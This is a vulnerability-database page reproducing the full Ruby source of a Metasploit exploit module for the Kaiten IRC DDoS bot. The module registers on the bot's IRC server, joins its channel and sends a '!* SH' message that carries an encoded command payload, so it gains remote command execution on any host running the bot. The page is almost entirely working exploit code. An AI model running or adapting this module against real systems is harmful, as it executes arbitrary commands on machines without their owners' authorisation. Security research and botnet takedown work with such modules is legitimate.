Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Malware exploit: Kaiten

🗓️ 14 Jan 2017 00:00:00Reported by shipcod3 / Jay TurlaType 
pwnmalw
 pwnmalw🔗 www.pwnmalw.re👁 600 Views

Malware exploit: Kaiten DDoS IRC Bot Remote Code Execution vulnerabilit

Code
<code>##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'


class MetasploitModule &lt; Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           =&gt; 'Kaiten DDoS IRC Bot  Remote Code Execution',
      'Description'    =&gt; %q{
          This module exploits the remote command execution vulnerability on the kaiten IRC Bot.
          kaiten is a known IRC based distributed denial of service client which accepts commands
          through its administrator via IRC.
        },
      'Author'         =&gt;
        [
          'Jay Turla'
        ],
      'License'        =&gt; MSF_LICENSE,
      'References'     =&gt;
        [
          [ 'URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/shellshock-vulnerability-downloads-kaiten-source-code/' ],
          [ 'URL', 'http://blog.malwaremustdie.org/2013/05/story-of-unix-trojan-tsunami-ircbot-w.html' ] #MalwareMustDie
        ],
      'Platform'       =&gt; %w{ unix win },
      'Arch'           =&gt; ARCH_CMD,
      'Payload'        =&gt;
        {
          'Space'    =&gt; 300, # According to RFC 2812, the max length message is 512, including the cr-lf
          'DisableNops' =&gt; true,
          'Compat'      =&gt;
            {
              'PayloadType' =&gt; 'cmd',
            }
        },
      'Targets'  =&gt;
        [
          [ 'kaiten', { } ]
        ],
      'Privileged'     =&gt; false,
      'DisclosureDate' =&gt; 'Oct 16 2015',
      'DefaultTarget'  =&gt; 0))

    register_options(
      [
        Opt::RPORT(6667),
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
      ], self.class)
  end

  def check
    connect

    response = register(sock)
    if response =~ /463/ or response =~ /464/
      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return Exploit::CheckCode::Unknown
    end

    response = join(sock)
    if not response =~ /353/ and not response =~ /366/
      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return Exploit::CheckCode::Unknown
    end

    quit(sock)
    disconnect

    if response =~ /auth/ and response =~ /logged in/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  def send_msg(sock, data)
    sock.put(data)
    data = ""
    begin
      read_data = sock.get_once(-1, 1)
      while not read_data.nil?
        data &lt;&lt; read_data
        read_data = sock.get_once(-1, 1)
      end
    rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT =&gt; e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    end

    data
  end

  def register(sock)
    msg = ""

    if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?
      msg &lt;&lt; "PASS #{datastore['IRC_PASSWORD']}\r\n"
    end

    if datastore['NICK'].length &gt; 9
      nick = rand_text_alpha(9)
      print_error("The nick is longer than 9 characters, using #{nick}")
    else
      nick = datastore['NICK']
    end

    msg &lt;&lt; "NICK #{nick}\r\n"
    msg &lt;&lt; "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

    response = send_msg(sock,msg)
    return response
  end

  def join(sock)
    join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
    response = send_msg(sock, join_msg)
    return response
  end

  def kaiten_command(sock)
    encoded = payload.encoded
    command_msg = "PRIVMSG #{datastore['CHANNEL']} :!* SH #{encoded}\r\n"
    response = send_msg(sock, command_msg)
    return response
  end

  def quit(sock)
    quit_msg = "QUIT :bye bye\r\n"
    sock.put(quit_msg)
  end

  def exploit
    connect

    print_status("#{peer} - Registering with the IRC Server...")
    response = register(sock)
    if response =~ /463/ or response =~ /464/
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return
    end

    print_status("#{peer} - Joining the #{datastore['CHANNEL']} channel...")
    response = join(sock)
    if not response =~ /353/ and not response =~ /366/
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return
    end

    print_status("#{peer} - Exploiting the kaiten IRC bot...")
    kaiten_command(sock)

    quit(sock)
    disconnect
  end
end
</code>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Jan 2017 00:00Current
0.4Low risk
Vulners AI Score0.4
metasploitremotekaitenddosircbotcommand executionvulnerabilityjay turlaunixwindowspayloadcheckirc passwordnicknamechannel
600